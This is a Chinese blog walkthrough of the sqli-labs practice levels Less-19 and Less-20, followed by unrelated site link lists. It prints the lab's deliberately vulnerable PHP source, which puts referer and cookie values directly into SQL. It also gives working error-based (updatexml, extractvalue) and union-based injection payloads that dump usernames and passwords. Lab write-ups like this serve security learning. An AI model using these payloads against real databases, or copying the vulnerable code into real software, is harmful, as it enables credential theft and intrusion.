>';$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";mysql_query($insert);//echo 'Your IP ADDRESS is: ' .$IP;echo "</font>";//echo "<br>";echo '<font color= "#0000ff" font size = 3 >';echo 'Your Referer is: ' .$uagent;echo "</font>";echo "<br>";print_r(mysql_error());echo "<br><br>";echo '<img src="../images/flag.jpg" />';echo "<br>";}else{echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg"  />';echo "</font>";  }}?></font></div></body></html>

从源代码中我们可以看到我们获取到的是HTTP_REFERER,那和less18是基本一致的,我们从referer进行修改

要获取用户名和密码的话,和之前是一样的
' or updatexml(1,concat(0x2b5e,(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)),1) or'

不过这次我们使用另一个函数,

EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串).
作用:从目标XML中返回包含所查询值的字符串

' or extractvalue(1,concat(0x2b5e,(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1))) or'

返回的结果是一样的,这里就不贴图了。


Less-20基于错误的cookie头部POST注入

先打开网页查看 Welcome Dhakkan


②查看源码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-20 Cookie Injection- Error Based- string</title></head><body bgcolor="#000000"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);if(!isset($_COOKIE['uname'])){//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome   <font color='#FF0000'> Dhakkan </font><br></div>";echo "<div  align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";echo "<div style='padding-top:10px; font-size:15px;'>"; echo "<!--Form to post the contents -->";echo '<form action=" " name="form1" method="post">';echo ' <div style="margin-top:15px; height:30px;">Username :    ';echo '   <input type="text"  name="uname" value=""/>  </div>';  echo ' <div> Password :      ';echo '   <input type="text" name="passwd" value=""/></div></br>';echo '   <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';echo '</form>';echo '</div>';echo '</div>';echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';echo '<font size="3" color="#FFFF00">';echo '<center><br><br><br>';echo '<img src="../images/Less-20.jpg" />';echo '</center>';function check_input($value){if(!empty($value)){$value = substr($value,0,20); // truncation (see comments)}if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled{$value = stripslashes($value);}if (!ctype_digit($value))   // Quote if not a number{$value = "'" . mysql_real_escape_string($value) . "'";}else{$value = intval($value);}return $value;}echo "<br>";echo "<br>";if(isset($_POST['uname']) && isset($_POST['passwd'])){$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);$cookee = $row1['username'];if($row1){echo '<font color= "#FFFF00" font size = 3 >';setcookie('uname', $cookee, time()+3600);header ('Location: index.php');echo "I LOVE YOU COOKIES";echo "</font>";echo '<font color= "#0000ff" font size = 3 >';//echo 'Your Cookie is: ' .$cookee;echo "</font>";echo "<br>";print_r(mysql_error());echo "<br><br>";echo '<img src="../images/flag.jpg" />';echo "<br>";}else{echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg" />';echo "</font>";  }}echo "</font>";  echo '</font>';echo '</div>';}else{if(!isset($_POST['submit'])){$cookee = $_COOKIE['uname'];$format = 'D d M Y - H:i:s';$timestamp = time() + 3600;echo "<center>";echo '<br><br><br>';echo '<img src="../images/Less-20.jpg" />';echo "<br><br><b>";echo '<br><font color= "red" font size="4">';echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];echo "</font><br>";echo '<font color= "cyan" font size="4">';echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];echo "</font><br>";echo '<font color= "#FFFF00" font size = 4 >';echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";echo '<font color= "orange" font size = 5 >';echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);echo "<br></font>";$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";$result=mysql_query($sql);if (!$result)  {  die('Issue with your mysql: ' . mysql_error());  }$row = mysql_fetch_array($result);if($row){  echo '<font color= "pink" font size="5">';  echo 'Your Login name:'. $row['username'];  echo "<br>";echo '<font color= "grey" font size="5">';  echo 'Your Password:' .$row['password'];  echo "</font></b>";echo "<br>";echo 'Your ID:' .$row['id'];  }else{echo "<center>";echo '<br><br><br>';echo '<img src="../images/slap1.jpg" />';echo "<br><br><b>";//echo '<img src="../images/Less-20.jpg" />';}echo '<center>';echo '<form action="" method="post">';echo '<input  type="submit" name="submit" value="Delete Your Cookie!" />';echo '</form>';echo '</center>';}else{echo '<center>';echo "<br>";echo "<br>";echo "<br>";echo "<br>";echo "<br>";echo "<br>";echo '<font color= "#FFFF00" font size = 6 >';echo " Your Cookie is deleted";setcookie('uname', $row1['username'], time()-3600);header ('Location: index.php');echo '</font></center></br>';}echo "<br>";echo "<br>";//header ('Location: main.php');echo "<br>";echo "<br>";//echo '<img src="../images/slap.jpg" /></center>';//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'Cookie:'.$cookee."\n");fclose($fp);}?></body></html>


分析代码,首先判断有无cookie,没有的话,查询出来再设置cookie,若cookie存在,又分两种情况:

第一种情况,你登陆过,cookie还有效,你没按删除cookie的按钮,那么他就输出各种信息,包括删除cookie的按钮

第二种情况,你按了删除cookie的按钮,后台就把cookie的时间设置为过期的时间,那么cookie就被删除了

关键代码:
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

那么久不废话了,一次性搞定吧
-admin' union select 1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users--+


如果有什么问题的话,欢迎在评论区回复。

查考链接:
http://blog.csdn.net/u012763794/article/details/51361152
http://www.cnblogs.com/lcamry/p/5763024.html


阅读全文
0 0
透视衣服软件 透视衣服软件
原创粉丝点击
热门IT博客
java编程技术java编程技术
aecc2017 macaecc2017 mac
access数据库创建查询
东方财富mac
java面试 csdn
淘宝网下载
淘宝客服技巧
python mmap 大文件
手机怎么成为淘宝卖家
h软件
java人机猜拳游戏
图灵系列图书 知乎
kdj选股软件
brother打印机mac驱动
python 多线程同时启动
风险矩阵图怎么绘制
windows 10 优化大师
dreamweaver调试js
nginx配置外网访问
聚富传媒软件
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 做鱼丸水放多了怎么办 点菜柜不制冷怎么办 米饭放太多水怎么办 煮干饭水放多了怎么办 蒸大米水放多了怎么办 蒸箱水箱漏水怎么办 蒸米饭溢锅怎么办 电饭锅蒸米饭生怎么办 煮饭水少了怎么办 忘记开发包柜发面包怎么办 蒸车加热管坏了怎么办 厨宝减压阀漏水怎么办 电饭锅饭煮夹生怎么办 元宵煮夹生了怎么办 蒸鸡蛋羹不熟怎么办 笔记本灭屏了怎么办 金华火腿太咸怎么办 外卖煲仔饭的煲 怎么办 大米色选机选不干净怎么办 模拟人生4厌精者怎么办 旋转拖把甩不干怎么办 洗澡的木桶漏水怎么办 木浴盆底漏水怎么办 木桶箍烂了怎么办 木盆裂缝了怎么办 泡脚木桶漏水怎么办 洗脚木盆漏水怎么办 木桶洗脚盆漏水怎么办 糯米蒸硬了怎么办 蒸糯米太硬怎么办 冰箱管子堵住了怎么办 耍朋友的尴尬怎么办 股票退市散户怎么办 建行卡折了怎么办 郑州儿童怎么办医保卡 美团预定单早到怎么办 和颐酒店会员卡怎么办 酒店镜子对着床怎么办 饭店倒闭了工资怎么办 海苔太甜了怎么办 泰国买到假货怎么办

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里